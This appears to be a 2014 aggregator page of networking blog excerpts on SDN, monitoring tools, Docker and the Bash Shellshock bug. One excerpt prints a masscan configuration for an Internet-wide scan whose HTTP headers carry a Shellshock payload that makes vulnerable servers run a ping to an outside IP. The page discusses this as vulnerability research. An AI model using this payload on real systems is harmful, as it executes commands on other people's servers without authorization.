Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop Debate on October 1st, where we’ll be discussing the options to pursue traditional certifications versus learning about SDN. Today’s post begins a series of posts related to topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying about SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it, many days, we do the job in front of us, with little time to devote to learning something unrelated. However, that’s a fundamental question for any IT knowledge-based worker. Do you have a development plan? Do you spend time working that plan? And now with SDN happening… how should you revise that plan in light of SDN? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we go in to observed trends, let’s put some context on this post and definitions around monitoring. Network monitoring and tapping, this can be described as “packet capture, packet and session analysis and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network but not so much the analysis. Tools like Wireshark, Lancope’s Stealth Watch and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days of past (and most current networks), if you want/ed to harvest packets from a network the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco have tools like the NAM, which comes in several forms such as a server, Catalyst 6500 switch module and ISR module. The NAM allows you to visually observe network trends and network conversations via generated graphs but also inspect by download the PCAP files. Probably one of the most pleasant experiences most people have in addition to Wireshark.

Some shortcomings exist with this approach in so much as the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to the application and the policies that govern them, I wanted to add some detail on a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application policy driven network behaviors. Our Affinities allow you to specify desired behavior between network endpoints, which will evolve with the enormous amount of policy work Mat described in his 3 piece article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and its many variations used for other policy constructs) way way back as a mechanism to instruct the switching chips inside their routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has very significantly evolved since then in Cisco’s implementation and many other of the router and switch vendors.

There are 2 basic components in an ACL:

1. what should I match a packet on

2. what is the action I take once I found a match.

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with requirements gathering phase and focuses on physical infrastructure design decisions covering compute, storage, physical and virtual networking, and network services. If you plan to build a private (or a reasonable small public) cloud, start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Docker Hub Official Repos: Announcing Language Stacks

shipping-containers

With Docker containers fast becoming the standard for building blocks for distributed apps, we’re working with the Docker community to make it easier for users to quickly code and assemble their projects.  Official Repos, publicly downloadable for free from the Docker Hub Registry, are curated images informed by user feedback and best practices.  They represent a focused community effort to provide great base images for applications, so developers and sysadmins can focus on building new features and functionality while minimizing repetitive work on commodity scaffolding and plumbing.

At DockerCon last June, we announced the first batch of Official Repos which covered many standard tools like OS distributions, web servers, and databases.  At the time, we had several organizations join us to curate Official Repos for their particular project, including Fedora, CentOS, and Canonical.  And the community responded enthusiastically as well: in the three months since they launched, Official Repos have so grown in popularity that they now account for almost 20% of all image downloads.

Parlez-vous…?

Based on the search queries on the Docker Hub Registry and discussions with many of you, we determined that the community wants pre-built stacks of their favorite programming languages.  Specifically, developers Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash vulnerability CVE-2014-6271 patched

This morning, Stephane Chazelas disclosed a vulnerability in the program bash, the GNU Bourne-Again-Shell. This software is widely used, especially on Linux servers, such as the servers used to provide CloudFlare’s performance and security cloud services.

This vulnerability is a serious risk to Internet infrastructure, as it allows remote code execution in many common configurations, and the severity is heightened due to bash being in the default configuration of most Linux servers. While bash is not directly used by remote users, it is used internally by popular software packages such as web, mail, and administration servers. In the case of a web server, a specially formatted web request, when passed by the web server to the bash application, can cause the bash software to run commands on the server for the attacker. More technical information was posted on the oss-sec mailing list.

The security community has assigned this bash vulnerability the ID CVE-2014-6271.

As soon as we became aware of this vulnerability, CloudFlare’s engineering and operations teams tested a patch to protect our servers, and deployed it across our infrastructure. As of now, all CloudFlare servers are protected against CVS-2014-6271.

Everyone who is using the bash software package should upgrade Continue reading

Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

Necessity of Analytics and Monitoring in the SDN Era

Necessity of Monitoring and Analytics in the SDN Era


by Hariharan Ananthakrishnan, Distinguished Engineer - September 24, 2014

A recent SDNCentral article about the Five Habits of Highly Effective SDN Startups asserts that achieving success in the SDN landscape will require creating focused products that solve real-world problems. In addition, the article emphasizes the need to build a sales channel with great partners, market strategically but be lean and mean, and adopt a slow and steady route into the SDN world. 

The article quoted the new landscape of SDN as we know it. Take a look at the diagram below. The building blocks range from controllers to network operating systems to monitoring and analytics. 



As the above diagram illustrates, monitoring and analytics are key. With SDN, the network self-adapts to the new demands of the application, and without visibility into these changes it’s very hard to say if an SDN application is doing the right things to your network. Understanding the programmable events that happen in real time requires mature analytics technology that can correlate service delivery to physical and virtual resource states. 

At Packet Design, we have been working on a solution for SDN analytics Continue reading

Network Troubleshooting with ThousandEyes

My first experience with ThousandEyes was a year ago at Network Field Day 6, where they were kind enough to give us a tour of their office, and introduce us to their products. I’ve been fairly distracted since then, but kept an eye on what other delegates like Bob McCouch were doing with the product since that demo.

A year later, at Network Field Day 8, they presented again. If you’ve never heard of ThousandEyes, and/or would like an overview, watch Mohit’s (CEO) NFD8 introduction:

 

Debugging the Internet

One of the things that really stuck out a year ago, and was reinforced tenfold this year, was that ThousandEyes was not introducing any new protocols to the industry – at a time when all of the headlines were talking about new protocols (i.e. OpenFlow). Numerous tech startups – especially those in networking – are in existence purely to tackle the big “software-defined opportunity” gold rush.

Instead, ThousandEyes is focused on network monitoring. If you’re like me – you hear those words and immediately conjure up images of all of the…..well, terrible software that exists today to monitor networks. In addition, network monitoring is inherently very fragmented. You can really only Continue reading

Proposed Junos XML Enhancements

I was looking at some Ethernet interface statistics last week when I realized I couldn’t find the output that confirmed the results of Ethernet Autonegotiation, just that autonegotiation had been enabled: john@noisy> show interfaces ge-0/0/0 Physical interface: ge-0/0/0, Enabled, Physical link … Continue reading

If you liked this post, please do click through to the source at Proposed Junos XML Enhancements and give me a share/like. Thank you!

Network Automation & Programmability Survey

Many vendors collect their own data that is more than likely a little skewed and biased.  As I prepare for a few upcoming presentations, I thought it would be great to get some REAL data from REAL people doing great things or even those just starting on their automation journey.

If you would be kind enough, there is a link to a survey below that asks a few questions pertaining to network automation and programmability.  No personal information is required.

Network Automation & Programmability Survey 

If you wish to see the results, please fill the survey out :)


Thanks in advance,
Jason

Twitter: @jedelman8

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first 2 parts of this series, you can catch them here and here. The short version is that there are Enterprise customers that are actively seeking to automate the production deployment of their workloads, which leads them to discover that capturing business policy as part of the process is critical. We’ve arrived here at the point that once policy can be encapsulated in the process of application workload orchestration, it is then necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to-date, networking has largely been about any-to-any all equal connectivity (at least in Data Centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester researcher wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading

Network Programmability 101: The Problem

In the first part of the Network Programmability webinar Matt Oswalt described some of the major challenges most networks are facing today:

  • Why is everyone claiming that the network is so slow to change?
  • Is that really the case? Why?
  • Why is the manual configuration culture so widespread in networking?
  • How does the holistic thinking in the design phase dissolve into the box mentality of CLI commands?
  • How does the box mentality limit the scalability of network deployments?

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned-books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and where Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts themselves. There are many examples, such as supporting coder's rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace Continue reading

Network Troubleshooting with ThousandEyes

My first experience with ThousandEyes was a year ago at Network Field Day 6, where they were kind enough to give us a tour of their office, and introduce us to their products. I’ve been fairly distracted since then, but kept an eye on what other delegates like Bob McCouch were doing with the product since that demo. A year later, at Network Field Day 8, they presented again. If you’ve never heard of ThousandEyes, and/or would like an overview, watch Mohit’s (CEO) NFD8 introduction: